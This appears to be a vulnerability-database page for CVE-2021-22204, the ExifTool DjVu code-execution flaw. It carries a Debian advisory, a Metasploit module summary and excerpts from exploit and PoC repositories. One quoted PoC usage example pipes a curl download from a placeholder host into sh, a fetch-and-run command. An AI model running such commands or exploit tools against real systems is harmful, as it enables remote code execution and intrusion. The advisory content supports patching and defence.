NA

CVE-2021-22204

Published: 23/04/2021 Updated: 16/05/2021
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

A vulnerability exists in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed. For the stable distribution (buster), this problem has been fixed in version 11.16-1+deb10u1. We recommend that you upgrade your libimage-exiftool-perl packages. For the detailed security status of libimage-exiftool-perl please refer to its security tracker page at: security-tracker.debian.org/tracker/libimage-exiftool-perl

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

Vendor Advisories

Debian Bug report logs - #987505 CVE-2021-22204: Improper neutralization of directives in dynamically evaluated code ('eval injection') Package: libimage-exiftool-perl; Maintainer for libimage-exiftool-perl is Debian Perl Group <pkg-perl-maintainers@listsaliothdebianorg>; Source for libimage-exiftool-perl is src:libimage-exiftool ...
A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed For the stable distribution (buster), this problem has been fixed in version 1116-1+deb10u1 We recommend that you upgrade you ...
Improper neutralization of user data in the DjVu file format in ExifTool versions 744 up to 1223 allows arbitrary code execution when parsing the malicious image ...

Mailing Lists

This Metasploit module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 744 through 1223 inclusive The injection is used to execute a shell command using Perl backticks The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field ...
ExifTool 744 to 1223 has a bug in the DjVu module which allows for arbitrary code execution when parsing malicious images The bug can be triggered from a wide variety of valid file formats The bug has been fixed in version 1224 References: Fixed release - exiftoolorg/historyhtml#v1224 Upstream patch - githubcom/exiftoo ...

Github Repositories

CVE-2021-22204-Payloads-and-Steps Additional payloads and functions

ctf-challenges Challenge: Zip! achievement Description Give me a zip file, I will tell you all about it, including the flag in /etc/flagtxt/ Hint Do you know CVE-2021-22204 I think blog of vakzz bug hunter is very interesting Flag HCMUS-CTF{CVE_22204_1s_v3ry_1nt3r3st1ng} Ý tưởng Challenge được lấy ý tưởng t

POC-CVE-2021-22204 nvdnistgov/vuln/detail/CVE-2021-22204 This is just a convenience script I wrote for testing Output Usage /build_imagepl <cmd to inject> Note: if your cmd contains unix special characters use quote! EG: /build_imagepl "curl xxxxcom/scriptsh|sh" This poc generates an image file (noteviljpg) to be procces

CVE-2021-22204

Gitlab-Exiftool-RCE RCE Exploit for Gitlab < 13103 GitLab Workhorse will pass any file to ExifTool The current bug is in the DjVu module of ExifTool Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file Usage python3 exploitpy -u root -p root -c "command here" -t gitlabexa

ExifCleaner Desktop app to clean metadata from images, videos, PDFs, and other files Benefits Fast Drag & Drop Free and open source (MIT) Windows, Mac, and Linux Supports popular image formats such as PNG, JPG, GIF, and TIFF Supports popular video formats such as M4A, MOV, and MP4 Supports PDF documents* (partial, see discussion) Batch-processing Multi-core suppo